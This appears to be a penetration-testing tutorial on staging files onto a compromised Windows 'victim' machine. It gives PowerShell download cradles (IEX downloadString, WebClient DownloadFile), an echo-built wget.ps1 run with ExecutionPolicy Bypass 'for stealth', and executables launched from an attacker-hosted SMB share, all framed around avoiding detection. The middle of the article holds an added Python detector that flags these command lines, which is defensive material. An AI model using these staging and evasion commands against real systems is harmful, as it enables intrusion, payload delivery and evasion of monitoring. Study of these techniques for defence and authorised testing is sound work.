Foreword

To avoid detection, it is best to use tools that are native to the victim’s computer.

FTP with Windows Host

While you have a shell on the Windows machine, start an FTP server on your host machine. Follow these steps if you don’t already have an FTP server installed:

sudo apt-get install vsftpd  
sudo service vsftpd start  
service vsftpd status #status should be active

To check if your server is working, type ftp localhost. If you see the message “Connected to localhost”, your FTP server is running.

Accessing File With Interactive Shell

If you have an interactive shell on the Windows machine, run this command.

cscript wget.vbs http://<YOUR IP>/<PATH TO FILE> <FILENAME TO SAVE AS>

Accessing File With Non-Interactive Shell

If you don’t have an interactive shell, you can’t start PowerShell.exe. A workaround is to create a PowerShell script and execute it:

echo $storageDir = $pwd > wget.ps1  
echo $webclient = New-Object System.Net.WebClient >>wget.ps1  
echo $url = "http://<YOUR IP>/<PATH TO FILE>" >>wget.ps1  
echo $file = "output-file.exe" >>wget.ps1  
echo $webclient.DownloadFile($url,$file) >>wget.ps1

To invoke wget.ps1, call

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

The -ExecutionPolicy Bypass -NoLogo -NonInteractive options are there for stealth.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<YOUR IP>/<FILENAME>','<FILENAME TO SAVE AS>')"
IEX(New-Object Net.WebClient).downloadString('http://<YOUR IP>/<FILENAME>')

Getting Files Through PowerShell

On your Kali Linux machine, copy the file you want to send to /var/www/html/. On the Windows machine, execute the following:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.10.128/unko.txt','C:\Users\Administrator\Desktop\transferme.txt')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.146/gori.ps1','gori.ps1')"

File Transfer With SMB

Method 1

Get smbserver.py from Impacket and run the following on your Kali Linux machine:

smbserver.py gori $(pwd) -smb2support -user gori -pass gorigori

Run this on the victim’s machine:

New-PSDrive -Name "gori" -PSProvider "FileSystem" -Root "\\<YOUR IP>\gori"

Method 2

Run this on your Kali machine:

smbserver.py kali .

Run this on the victim’s machine:

\\<YOUR IP ADDRESS>\kali\FILE_NAME.exe "whoami"

The "whoami" argument confirms that it is running.
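
The Windows-side commands in the sections above leave recognizable command lines in process-creation and PowerShell logs when command-line logging is enabled, and that is what a defender matches on. The following Python is an added example, not part of the original article: it flags those command-line shapes and correlates a .ps1 file built with echo redirection with its later execution on the same host. The rule names, hostnames and sample events are constructed for illustration.

```python
import re

# Rule names are this example's own; the patterns target the commands shown in the article.
RULES = {
    "webclient_download": re.compile(r"\bwebclient\b.*\.download(file|string)\s*\(", re.I),
    "iex_downloadstring": re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I),
    "policy_bypass": re.compile(r"powershell(\.exe)?\b.*\s-(ep|ex[a-z]*)\s+bypass", re.I),
    "script_host_url": re.compile(r"\b[cw]script(\.exe)?\b.*https?://", re.I),
    "exe_from_unc_share": re.compile(r'^"?\\\\[^\\\s]+\\[^\\]+\\[^"]*\.exe\b', re.I),
}
ECHO_TO_PS1 = re.compile(r"\becho\b.*>>?\s*(\S+\.ps1)\b", re.I)
RUN_PS1 = re.compile(r"powershell(\.exe)?\b.*\s-f(ile)?\s+(\S+\.ps1)\b", re.I)


def normalize(cmdline):
    """Drop cmd caret / PowerShell backtick escapes and collapse whitespace."""
    return re.sub(r"\s+", " ", re.sub(r"[\^`]", "", cmdline)).strip()


def classify(cmdline):
    """Return the sorted names of all rules matching one command line."""
    text = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def staged_script_runs(events):
    """Find .ps1 files built with echo redirection and later run on the same host."""
    built, hits = set(), []
    for host, cmdline in events:
        text = normalize(cmdline)
        if m := ECHO_TO_PS1.search(text):
            built.add((host, m.group(1).lower()))
        elif (m := RUN_PS1.search(text)) and (host, m.group(3).lower()) in built:
            hits.append((host, m.group(3)))
    return hits


# Constructed sample events (host, command line); 192.0.2.10 is a documentation address.
EVENTS = [
    ("ws01", r"cmd.exe /c echo $webclient.DownloadFile($url,$file) >>wget.ps1"),
    ("ws01", r"cmd.exe /c p^owershell -Exec^utionPolicy Bypass -NonInteractive -File wget.ps1"),
    ("ws02", r"cscript wget.vbs http://192.0.2.10/a.exe a.exe"),
    ("ws02", r"IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/a.ps1')"),
    ("ws03", r'\\192.0.2.10\kali\FILE_NAME.exe "whoami"'),
    ("ws03", r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),  # benign
    ("ws03", r"cscript C:\Windows\System32\slmgr.vbs /dli"),             # benign
]

if __name__ == "__main__":
    for host, cmd in EVENTS:
        print(host, classify(cmd) or "-", cmd)
    print("staged script runs:", staged_script_runs(EVENTS))
```

The two benign events show why the rules key on the download call, the bypass flag or a URL argument and not on powershell.exe or cscript alone.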

File Transfer With an HTTP Server

On your machine run:

python3 -m http.server 80

This starts an HTTP server on port 80 whose root is the directory you ran the command from. To get a file, run this on the victim’s machine:

wget http://<YOUR IP>/path/to/file.txt

File Transfer with SCP and RSYNC

Both of these file transfer methods run over SSH. Secure Copy Protocol (SCP) is being deprecated; however, if you’re able to use it, the syntax is fairly simple.

scp <SOURCE> <DESTINATION>

In this example, we use SCP to copy a file from a remote host to the working directory of our local machine, so our computer is on the receiving end.

scp username@ip_address:/home/username/filename .

If you are looking to transfer a file from your computer to the remote host, the following syntax can be used:

scp filename username@ip_address:/home/username

The same commands can be used with rsync by simply replacing scp with rsync.

rsync <SOURCE> <DESTINATION>

Conclusion

There are countless ways to transfer files between two computers. Among the most common methods are HTTP and FTP, but if those don’t work, there is a chance that some of the other options here will. Some honorable mentions that I didn’t go into detail on are SSHFS, SFTP, WinSCP, and Samba. I hope that you were able to find value in this article, and remember to never stop learning.